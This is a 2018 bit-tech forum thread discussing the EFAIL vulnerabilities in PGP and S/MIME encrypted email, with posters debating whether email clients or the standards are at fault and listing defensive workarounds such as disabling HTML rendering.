1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

News Researchers warn of PGP/GPG email vulnerabilities

Discussion in 'Article Discussion' started by bit-tech, 14 May 2018.

  1. bit-tech

    bit-tech Supreme Overlord Lover of bit-tech Administrator

    Joined:
    12 Mar 2001
    Posts:
    3,676
    Likes Received:
    138
    Read more
     
    bit-tech, 14 May 2018
    #1
  2. leexgx

    leexgx CPC hang out zone (i Fix pcs i do )

    Joined:
    28 Jun 2006
    Posts:
    1,356
    Likes Received:
    8
    Why uninstall it

    Its the email client that is the issue, if using thunderbird its going to be fixed soon (the problem is not with PGP it's with the email client)
     
    leexgx, 15 May 2018
    #2
  3. Gareth Halfacree

    Gareth Halfacree WIIGII! Lover of bit-tech Administrator Super Moderator Moderator

    Joined:
    4 Dec 2007
    Posts:
    17,131
    Likes Received:
    6,725
    The problem is in the OpenPGP and S/MIME standards, which won't be fixed soon - but patches to workaround the problem will drop imminently.

    Meanwhile: the article has been updated.

    Full details of the vulnerabilities have now been released on the "efail" website. The vulnerabilities detailed use externally-loaded resources in HTML-format email to exfiltrate plaintext from encrypted emails. Immediate workarounds include disabling decryption in the email client and requiring manual decryption using an external utility - effectively following the EFF's recommendation to uninstall encrypted email add-ons to prevent automatic decryption and thus disclosure of plaintext - and disabling the rendering of HTML emails. Medium-term fixes will come in the form of patches, the researchers have promised, while the long-term solution will be to update the affected standards - OpenPGP, MIME, and S/MIME - to remove the risk altogether.
     
    Gareth Halfacree, 15 May 2018
    #3
  4. edzieba

    edzieba Virtual Realist

    Joined:
    14 Jan 2009
    Posts:
    3,909
    Likes Received:
    591
    Bloody hell, one of the vulns is an unclosed tag attack?! That is "little bobby tables" level embarrassing.

    To paraphrase Miyazaki, "HTML in email was a mistake".
     
    edzieba, 15 May 2018
    #4
  5. Corky42

    Corky42 Where's walle?

    Joined:
    30 Oct 2012
    Posts:
    9,648
    Likes Received:
    388
    The first thing i do with any email client is to disable HTML and/or only display in plain text, i guess there must be loads of reasons for HTML emails but they've always seemed to be on the wrong side of my risk/reward mentality.
     
    Corky42, 15 May 2018
    #5
  6. jb0

    jb0 Minimodder

    Joined:
    8 Apr 2012
    Posts:
    555
    Likes Received:
    93
    Honestly, the problem is that SMTP is not designed to BE a secure communications platform. PGP is more secure than nothing, but operating on top of SMTP places limits on how secure it can actually be.
     
    jb0, 16 May 2018
    #6
  7. leexgx

    leexgx CPC hang out zone (i Fix pcs i do )

    Joined:
    28 Jun 2006
    Posts:
    1,356
    Likes Received:
    8
    That has nothing to do with this issue

    smtp / pop3 and so on is the communication method to deliver emails

    Its the content and how client interacts with them is the issue (html in emails is Never a good idea)
     
    leexgx, 16 May 2018
    #7
Tags: Add Tags

Share This Page